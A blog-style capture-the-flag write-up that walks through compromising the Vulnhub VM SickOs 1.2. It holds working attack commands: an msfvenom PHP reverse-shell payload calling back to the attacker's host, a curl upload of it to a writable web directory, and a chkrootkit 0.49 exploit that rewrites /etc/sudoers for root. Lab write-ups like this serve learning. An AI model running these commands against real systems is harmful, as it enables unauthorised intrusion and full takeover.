Another day another CTF (capture the flag) if you got no projects better sharpen your skill playing CTF :p , this time it’s called SickOs:1.2 from Vulnhub
1. Service Discovery
We started off using nmap to scan all tcp ports
Two TCP Ports open 22 and 80 and nothing interesting on SSH, Usually, I proceed to scan UDP, but I just to lazy, i wanted to see how fast i can Finnish this .
Nothing interesting on port 22, lets jump up to see what is on port 80
2.2. Port 80 HTTP
Let’s take a look on pot 80, we start with using Nikto
Nothing special here, let’s see from the web browser
All I see is the dude from matrix, alright, I thought so too Neo, next we’ll fire up the Dirbuster
I can see that there is a directory called test, lets enumerate further
Very nice, look like i can upload files to this directory, i’ll upload a Msfvenom file, using this command :
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=443 -f raw > tai.php
Next, upload the file tai.php using curl (I love curl)
curl --upload-file tai.php http://192.168.0.106/test/tai.php -0 --http1.0
and the file is successfully uploaded
Do not pay attention to the other files, those are my experiments, it took me awhile to figure out that the reverse shell only work on port 443 😀
Next step is to setup a Multi/Handler Listener on metaslpoit, and click on the file
We have meterpreter, we drop down into shell, but unfortunately we only have shell with limited privilege, we need to escalate our privilege to root, lets just enumerate further from here.
We can see that the target machine is using Linux Ubuntu on 3.11 kernel, and some fancy banner, as usual at this point I upload and run the linuxprivchecker.py, complete result can be seen here
After spent hours of searching exploit-db.com for vulnerability and some enumeration I found that the target machine is running chkrootkit version 0.49 which is vulnerable. After checking the scheduled corn job I can see that it run daily, next step, I run this command :
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
After several minutes i ran sudo su, for root privilege
and capture the flag which is located in /root directory
Nice VM, I learnt some new techniques. Thanks D4rk36 and Vulnhub!